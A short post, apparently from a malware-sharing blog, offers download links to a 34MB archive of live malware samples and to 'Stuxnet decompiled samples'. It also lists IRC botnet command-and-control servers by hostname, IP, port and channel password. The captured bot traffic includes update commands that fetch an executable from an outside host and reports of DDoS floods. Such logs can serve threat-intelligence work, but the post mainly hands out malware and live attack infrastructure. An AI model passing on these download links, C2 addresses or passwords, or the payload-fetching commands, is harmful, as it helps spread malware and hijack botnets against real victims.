Another malware package

Here around 34mb malware samples (fake antiviruses,passwd stealers,banking trojans etc) Download: http://www.p1nk.me/VtzvTy

dns.googleure.com(botnet hosted in Russian Federation 2×4.ru Network)

dns.googleure.com DNS_TYPE_A 92.241.164.227 92.241.164.227:1234 Nick: n{US|XPa}xvwpyyv Username: xvwpyyv Server Pass: null Joined Channel: #!ngr! with Password ngrBot Joined Channel: #US Channel Topic for Channel #!ngr!: “.mod pdef off .s .j -c IT,ITA,ES,ESP,FR,FRA #uz4 .up http://jeanie.ws/new.exe 3c62c54ff04ae4af8262ae4d5e2683c7” Private Message to Channel #!ngr!: “[d=”http://jeanie.ws/new.exe” s=”278528 bytes”] Updated bot file “C:Documents and SettingsAdministratorApplication DataDekfki.exe”” infos about hosting: http://whois.domaintools.com/92.241.164.227

nice.niceshot.in(botnet hosted in Netherlands Rijndata B.v)

Remote Host Port Number 46.21.169.42 6567 PASS s1m0n3t4 MODE [SI|USA|00|P|57896] -ix JOIN #yur# c1rc0dusoleil PONG Apple.Network NICK [SI|USA|00|P|57896] USER XP-0495 * 0 :COMPUTERNAME MODE [SI|USA|00|P|69385] -ix JOIN #wal# c1rc0dusoleil PRIVMSG #wal# :[Dl]: File download: 96.0KB to: C:DOCUME~1UserNameLOCALS~1Temperaseme_12581.exe @ 96.0KB/sec. QUIT [Update]: Updating to new bin. NICK [SI|USA|00|P|48857] USER XP-5184 * 0 :COMPUTERNAME MODE [SI|USA|00|P|48857] -ix

77.79.7.106(botnet hosted in Lithuania Webhosting Collocation Services)

Remote Host Port Number 174.37.72.72 80 204.0.5.56 80 216.178.38.224 80 63.135.80.46 80 69.63.181.16 80 77.79.7.106 6663 PASS xxx MODE NEW-[USA|00|P|01494] -ix JOIN #!nn! test PONG irc.priv8net.com NICK NEW-[USA|00|P|01494] USER XP-6931 * 0 :COMPUTERNAME Now talking in #!nn! Topic On: [ #!nn! ] [ .m.s|.m.e Foto 😀 http://apps.facebook.com/phootosofyour/photo.php?= ] Topic By: [ wd38 ] Topic: wd38

minerva.cdmon.org(botnet hosted in Netherlands Amsterdam As29073 Ecatel Ltd)

NICK {XPUSA288239} USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA288239} -ix JOIN ##spam## MODE ##spam## -ix PRIVMSG ##spam## :.::[DDoS]::. Flooding 127.0.0.2:1234 with ddos.syn for 50 seconds PRIVMSG ##spam## :.::[DDoS]::. Done with flood (0KB/sec). NICK {XPUSA796543} MODE {XPUSA796543} -ix Resolved : [minerva.cdmon.org] To [89.248.172.225] Now talking in ##security-check## Topic On: [ ##security-check## ] [ .part ##security-check# ]

205.234.213.231(botnet hosted in United States Chicago Hostforweb Inc)

Remote Host Port Number 204.0.5.51 80 63.135.80.224 80 63.135.80.46 80 205.234.213.231 1234 PASS xxx NICK NEW-[USA|00|P|39876] USER XP-0115 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|39876] -ix JOIN #!nn! test PONG 22 MOTD infos about hosting: http://whois.domaintools.com/205.234.213.231

Stuxnet decompiled samples

Source here:http://crowdleaks.org/hbgary-wanted-to-suppress-stuxnet-research/ Download: http://11ec4fbd.whackyvidz.com